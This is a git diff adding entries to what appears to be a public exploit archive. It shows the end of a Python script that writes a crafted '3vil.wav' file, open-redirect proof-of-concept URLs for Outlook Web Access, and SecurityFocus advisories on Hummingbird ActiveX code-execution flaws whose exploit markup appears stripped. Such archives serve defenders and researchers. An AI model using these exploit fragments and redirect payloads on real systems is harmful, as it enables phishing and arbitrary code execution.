+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+
+filename = "3vil.wav"
+file = open(filename , "w")
+file.write(header)
+print "\n Done!\n"
+file.close()
\ No newline at end of file
diff --git a/platforms/windows/remote/32489.txt b/platforms/windows/remote/32489.txt
new file mode 100755
index 000000000..1c6ead316
--- /dev/null
+++ b/platforms/windows/remote/32489.txt
@@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/31765/info + +Outlook Web Access is prone to a remote URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. + +A successful exploit may aid in phishing attacks. + +OWA 6.5 SP 2 is vulnerable; other versions may also be affected. + +https://webmail.example.com/exchweb/bin/redir.asp?URL=http://www.example2.com + +https://webmail.example.com/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttp%3A%2F%2Fwww.example2.com&reason=0 \ No newline at end of file diff --git a/platforms/windows/remote/32491.html b/platforms/windows/remote/32491.html new file mode 100755 index 000000000..e18936bcc --- /dev/null +++ b/platforms/windows/remote/32491.html @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/31783/info + +Hummingbird HostExplorer ActiveX control is prone to a buffer-overflow vulnerability because the application fails to adequately check boundaries on user-supplied input. + +An attacker can exploit this issue to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions. + + \ No newline at end of file diff --git a/platforms/windows/remote/32493.html b/platforms/windows/remote/32493.html new file mode 100755 index 000000000..a6b813dc3 --- /dev/null +++ b/platforms/windows/remote/32493.html 
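Review bot: The last added line of 32491.html is empty in this view, so the ActiveX control markup the advisory text refers to is not visible here; the same holds for the final line of 32493.html. This looks like HTML stripped when the page was rendered rather than an empty line in the committed file, but it cannot be confirmed from this page, so the committed files should be checked before treating these entries as complete.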
@@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/31799/info + +Hummingbird Deployment Wizard 10 ActiveX control is prone to multiple vulnerabilities that attackers can exploit to run arbitrary code. The issues stem from insecure methods used within 'DeployRun.dll'. + +An attacker can exploit these issues by enticing an unsuspecting victim to visit a malicious HTML page. + +Successfully exploiting these issues allows remote attackers to edit registry key information or execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts will likely result in denial-of-service conditions. + +Hummingbird Deployment Wizard 10 10.0.0.44 is vulnerable; other versions may also be affected. + + \ No newline at end of file